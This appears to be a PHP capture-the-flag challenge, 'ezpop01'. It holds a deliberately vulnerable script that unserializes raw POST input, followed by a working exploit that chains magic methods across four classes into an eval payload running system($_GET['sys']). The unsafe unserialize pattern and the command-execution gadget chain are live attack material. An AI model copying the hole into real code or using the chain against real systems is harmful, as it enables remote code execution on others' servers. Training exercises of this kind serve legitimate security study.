ezpop01

pop.php

<?php

class crow
{
    public $v1;
    public $v2;

    function eval()
    {
        echo new $this->v1($this->v2);
    }


    public function __invoke()
    {
        // call: fin
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct() // start
    {
        // toString what
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        // get_flag mix
        echo $this->f1->get_flag();
    }
}

class what
{
    public $a;

    public function __toString()
    {
        // run: mix
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        // invoke: crow
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }
}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
    die();
} else {
    highlight_file(__FILE__);
    die();
}

// exp

$a1 = new fin();
$a2 = new what();
$a3 = new mix();
$a4 = new crow();
$a5 = new fin();
$a6 = new mix();

$a1->f1 = $a2; // toString
$a2->a = $a3; // run
$a3->m1 = $a4; // invoke
$a4->v1 = $a5; // call
$a5->f1 = $a6; // get_flag
$a6->m1 = "\necho('OK');system(\$_GET['sys']);exit();";


echo urlencode(serialize($a1));
echo "\n<br/>";
die();